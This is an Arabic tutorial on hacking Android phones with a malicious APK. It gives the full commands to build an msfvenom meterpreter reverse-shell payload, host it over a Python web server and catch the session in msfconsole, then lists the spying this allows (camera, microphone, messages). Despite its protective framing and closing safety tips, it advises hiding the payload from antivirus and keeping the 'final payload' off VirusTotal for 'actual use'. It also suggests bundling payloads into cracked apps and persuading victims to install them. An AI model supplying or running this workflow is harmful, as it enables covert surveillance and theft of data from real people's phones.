ما رأيك لو أخبرتك أن هاتفك قد يكون مراقبًا الآن؟ محادثاتك، رسائلك، وحتى موقعك، كلها قد تكون في يد شخص آخر. وكل هذا بسبب تطبيق يبدو طبيعيًا تمامًا. كيف يحدث هذا، وكيف تحمي نفسك؟ دعونا نكتشف الحقيقة.
في هذا المقال، سنغطي كل شيء بدءًا من تجهيز بيئة الاختبار، إلى تنفيذ الهجوم، وأخيرًا، كيفية حماية أنفسنا. لكن قبل أن ندخل في التفاصيل التقنية، دعونا نفهم ما هو الموضوع بالضبط ولماذا وكيف يمكن لهذه المعرفة أن تحمينا.
فهم اختراق الهواتف
عندما نتحدث عن اختراق الهواتف، لا نقصد فقط أن أحدهم يخمن كلمة مرورك. الموضوع أخطر من ذلك. الاختراق يعني وصولًا غير مصرح به إلى جهازك والتحكم فيه، من قراءة رسائلك وتتبع موقعك، وقد يصل الأمر إلى التحكم في الميكروفون وكاميرا الجهاز.
لدى المهاجمين أساليب كثيرة تتطور مع الوقت، منها:
- البرامج الضارة (Malware): هي فيروسات رقمية تدخل إلى جهازك وتسرق بياناتك أو تسبب ضررًا بالنظام.
- التصيد الاحتيالي (Phishing): يقوم المهاجمون بإنشاء مواقع أو تطبيقات مزيفة ومقنعة لسرقة معلوماتك الحساسة. وهذا ما رأيناه سابقًا وكيف يمكننا تنفيذ بعض هذه الهجمات.
- هجمات الرجل في الوسط (Man-in-the-Middle): تكون بعض الهجمات أكثر تعقيدًا، حيث يتجسس شخص على تواصلك مع شخص آخر دون أن يلاحظ أحد، حتى أنه يستطيع تعديل رسائلك. هذا يمكن أن يحدث بسهولة عند استخدام شبكات الواي فاي العامة أو حتى عند اختراق شبكة الواي فاي المنزلية، والتي برأيي هي أسهل طريقة للاختراق.
- الهندسة الاجتماعية (Social Engineering): أخطر طريقة هي التي لا تعتمد على المهارات التقنية، بل على التلاعب النفسي، حيث يخدعونك لتعطيهم معلوماتك بنفسك أو لتحميل برامج ضارة دون أن تشعر. وهذه مهمتك في كيفية إقناع الضحية.
في هذا المقال، سنركز على نوع خطير من البرامج الضارة وتقنيات التصيد التي تستهدف أجهزة أندرويد. سنوضح كيف يستطيع المهاجمون إنشاء تطبيق ضار وجعل الضحية تثبته. هذا سيعطينا فكرة واضحة عن مدى التحكم الذي يمكن للمهاجم الحصول عليه في جهاز مخترق. لكن الأهم، تذكروا أن هدفنا هنا ليس الأذى، بل فهم هذه التهديدات لكي نحمي أنفسنا بشكل أفضل.
الخطوة الأولى: تجهيز بيئة الاختبار الافتراضية
لإنشاء بيئتنا الافتراضية، اذهب إلى أي محرك بحث (أنا أستخدم Bing) واكتب Genymotion
. عندما تظهر لك النتائج، يمكنك التنزيل مباشرة. يمكنك الدخول إلى موقعهم الرسمي، وبعد ذلك، اذهب إلى قسم التنزيلات.
ستجد خيارين للتنزيل. نزل النسخة التي تريدها. لو افترضنا أنك تستخدم ويندوز، انتبه هنا: إذا كان لديك VirtualBox مثبتًا مسبقًا، اختر الخيار الثاني، لأن الخيار الأول سيقوم بتنزيل VirtualBox مرة أخرى. أغلب الظن أنني قد شرحت لكم سابقًا كيفية استخدام VirtualBox، فالأغلبية لديهم، لذا اختر الخيار الثاني.
عندما تقوم بتنزيله، بقية الخطوات سهلة جدًا: “التالي” ثم “التالي” حتى تنتهي ويتم تثبيته لديك. عندما يتم تثبيته، افتح التطبيق من سطح المكتب. قبل فتحه، سيحذرك من أنه يجب عليك إعادة تشغيل الجهاز. قم بإعادة التشغيل لكي يعمل التطبيق بطريقة أفضل وتتجنب ظهور الأخطاء.
بعد إعادة تشغيل الجهاز وتشغيل التطبيق مرة أخرى، سينقلك إلى صفحة تسجيل الدخول. يمكنك إنشاء حساب بشكل طبيعي؛ سينقلك إلى المتصفح لإنشاء حساب جديد، ثم قم بتأكيد البريد الإلكتروني. بعد ذلك، اكتب معلومات الدخول وادخل إلى التطبيق.
بعد الدخول، ستظهر لك الواجهة الرئيسية. ما يهمنا هو علامة الزائد (+). عند الضغط عليها، سترى أنواعًا كثيرة من الأجهزة. هنا يمكنك تجربة الحمولة الخبيثة (payload) الخاصة بك على أكثر من جهاز دون إلحاق الضرر بأحد، وبالتالي تعرف إذا كانت تعمل أم لا.
لدينا خيارات كثيرة، يمكنك مثلًا اختيار Google Pixel 3. اضغط على “Next”. هنا إذا أردت تغيير الاسم أو إجراء أي تعديل على المعلومات (بالنسبة لي لا أحتاج ذلك). هنا أيضًا إذا كنت تحتاج لتعديل المعالج، حجم الذاكرة (RAM)، أو حجم الجهاز الافتراضي (VM size)، يمكنك فعل ذلك. أنا لن أغير شيئًا وسأتركه كما هو. اضغط “Next” مرة أخرى. ستظهر معلومات إضافية قد لا تهمك، اضغط “Next”. في النهاية، اختر إعدادات الشبكة، ابقَ على الخيار الافتراضي (NAT) ثم اضغط “Install”.
عند الضغط على “Install”، سيبدأ تنزيل جهاز Google Pixel 3. تعتمد سرعة التنزيل على سرعة الإنترنت لديك. بعد ذلك، سيتم إعداده في VirtualBox، ولهذا السبب قلنا إن وجود VirtualBox مهم.
الآن، عند تشغيل تطبيق VirtualBox، ستجد أن الجهاز تم إنشاؤه تلقائيًا بواسطة Genymotion. اضغط عليه ضغطتين وهو سيعمل بنفسه ويهيئ نفسه حتى يعمل المحاكي في تطبيق Genymotion كهاتف طبيعي. فقط انتظر حتى ترى رسالة التأكيد النهائية، وبذلك تعرف أن التطبيق جاهز.
الآن عد إلى Genymotion واضغط على الجهاز الذي أنشأته. سترى أنه يقوم بالتمهيد (Booting). سيعمل نظام التشغيل الخاص بـ Google Pixel 3 وسترى جهازًا وكأنه هاتف حقيقي. يمكنك الوصول منه إلى المتصفح، ومن المتصفح سنقوم بتنزيل الحمولة الخبيثة الخاصة بنا.
الخطوة الثانية: إنشاء الحمولة الخبيثة (Payload)
الآن ننتقل إلى نظام كالي لينكس (إذا لم يكن مثبتًا لديك، قم بتثبيته). افتح الطرفية (Terminal) واكتب الأمر التالي لإنشاء الحمولة الخبيثة باستخدام msfvenom
.
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -o app.apk
شرح الأمر:
sudo
: لتنفيذ الأمر بصلاحيات المدير.msfvenom
: الأداة المستخدمة لإنشاء الحمولات.-p android/meterpreter/reverse_tcp
: لتحديد نوع الحمولة، وهي جلسة meterpreter لأندرويد تتصل بنا مرة أخرى (reverse TCP).LHOST
: يجب أن تضع هنا عنوان IP الخاص بك. يمكنك الحصول عليه بكتابة أمرifconfig
في الطرفية.LPORT
: المنفذ الذي سيتم استخدامه للاتصال. الرقم4444
هو الشائع، ولكن يمكنك اختيار أي منفذ.-o app.apk
: لتحديد اسم الملف الناتج. سميتهapp.apk
، ولكن يمكنك اختيار أي اسم.
الخطوة الثالثة: إعداد خادم ومستمع
بعد إنشاء الحمولة، نحتاج إلى طريقة لنقلها إلى جهاز الضحية. سنقوم بإنشاء خادم ويب بسيط باستخدام بايثون. في نفس المجلد الذي يوجد به ملف app.apk
، اكتب الأمر التالي:
python3 -m http.server 8000
الآن، أي شخص يصل إلى عنوان IP الخاص بك على المنفذ 8000
سيتمكن من رؤية الملفات في هذا المجلد وتنزيلها.
في نافذة طرفية أخرى، سنستخدم msfconsole
لإعداد “مستمع” ينتظر الاتصال من جهاز الضحية.
msfconsole
بعد أن يفتح، اتبع الأوامر التالية:
- اختر المعالج (Handler):
use multi/handler
- حدد نفس الحمولة التي أنشأتها:
set payload android/meterpreter/reverse_tcp
- اعرض الخيارات للتأكد:
show options
- اضبط الـ LHOST والـ LPORT بنفس القيم التي استخدمتها في
msfvenom
:set LHOST <YOUR_IP> set LPORT 4444
- ابدأ المستمع:
run
الآن، msfconsole
في وضع الاستماع. بمجرد أن يقوم الضحية بتثبيت وفتح التطبيق الخبيث، ستحصل على جلسة تحكم.
الخطوة الرابعة: تنفيذ الهجوم
على جهاز الضحية (في حالتنا، المحاكي)، افتح المتصفح واكتب عنوان IP الخاص بك متبوعًا بالمنفذ http://<YOUR_IP>:8000
. ستظهر لك صفحة تحتوي على ملف app.apk
. قم بالضغط عليه وتنزيله.
بعد التنزيل، قم بتثبيت التطبيق. قد تحتاج إلى السماح بالتثبيت من “مصادر غير معروفة” في إعدادات أندرويد. بمجرد فتح التطبيق، ستلاحظ أن جلسة meterpreter
قد بدأت في نافذة msfconsole
على جهاز كالي الخاص بك.
الخطوة الخامسة: التحكم في الجهاز
لقد نجح الهجوم. الآن لديك جلسة تحكم كاملة. يمكنك كتابة help
لرؤية قائمة بالأوامر المتاحة.
على سبيل المثال، يمكنك استخدام sysinfo
للحصول على معلومات حول نظام الجهاز للتأكد من أنك متصل بالجهاز الصحيح.
meterpreter > sysinfo
ستظهر لك معلومات مثل Android 10
. يمكنك أيضًا فتح الكاميرا، تسجيل الصوت من الميكروفون، الوصول إلى الرسائل، جهات الاتصال، وغيرها الكثير.
تقنيات التخفي المتقدمة
الحمولة التي أنشأناها أساسية. في الواقع، برامج مكافحة الفيروسات الحديثة قد تكتشفها. لذلك، تحتاج إلى تضمين بعض أنواع التشفير القوية لحمولتك لإخفاء طبيعتها عن برامج مكافحة الفيروسات. يمكنك تجربة أكثر من تشفير وطبقة باستخدام الخيارات المتاحة في msfvenom
.
ملاحظة هامة: يمكنك تجربة الحمولة على مواقع الفحص مثل VirusTotal، ولكن كن حذرًا. عندما تفحص حمولتك ويكتشف الموقع أنها فيروس، سيتم إنشاء “بصمة” خاصة لهذه الحمولة ومشاركتها مع بقية برامج مكافحة الفيروسات. لذلك، إذا نجحت في إنشاء حمولة غير قابلة للكشف، قم بإنشاء واحدة أخرى تشبهها للاستخدام الفعلي، لأن البصمة تتغير. لا تفحص أبدًا حمولتك النهائية على VirusTotal.
طريقة أخرى شائعة هي دمج الحمولة في برامج “الكراك”. يأخذ المهاجمون تطبيقًا مدفوعًا ويجعلونه مجانيًا، وعندما تقوم بتحميله، يكون بداخله هذه الحمولة التي تتيح لهم التحكم في جهازك.
كيف تحمي نفسك؟
الاختيار هنا يعتمد على فطنتك وطريقة تفكيرك. إليك بعض النصائح لحماية نفسك:
- لا تثبت أي تطبيقات من مصادر مشبوهة. التزم بمتجر Google Play الرسمي.
- تحقق من الأذونات. إذا طلب تطبيق وصولًا للكاميرا أو الميكروفون أو الموقع، اسأل نفسك: “لماذا يحتاج هذه الأذونات؟”. لا تضغط “سماح” دون تفكير.
- حافظ على تحديث جهازك دائمًا. الكثير من الهجمات تستغل الثغرات التي تم إصلاحها في الإصدارات الأحدث.
- استخدم حلول أمان موثوقة للهاتف. على الرغم من أن برامج مكافحة الفيروسات لا تكتشف كل شيء، إلا أنها يمكن أن توفر لك طبقة حماية إضافية.
- راقب سلوك جهازك. إذا لاحظت سلوكًا غير طبيعي، مثل استنزاف البطارية بسرعة أو استخدام غير متوقع للبيانات، فقد تكون هذه علامات على وجود برامج ضارة.
- تجنب برامج الكراك أو المعدلة. يحب الناس البرامج المجانية من الإصدارات المدفوعة، ولكن معظم من يقومون بتعديل هذه البرامج يضعون فيها حمولات خبيثة مثل التي رأيناها لاختراقك من خلالها.